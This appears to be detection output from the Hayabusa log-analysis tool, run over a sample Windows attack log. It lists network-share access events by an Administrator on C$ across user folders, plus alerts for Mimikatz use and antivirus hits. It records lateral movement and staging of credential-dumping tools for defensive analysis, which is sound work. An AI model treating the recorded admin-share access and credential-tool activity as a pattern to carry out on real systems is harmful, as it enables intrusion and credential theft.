2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
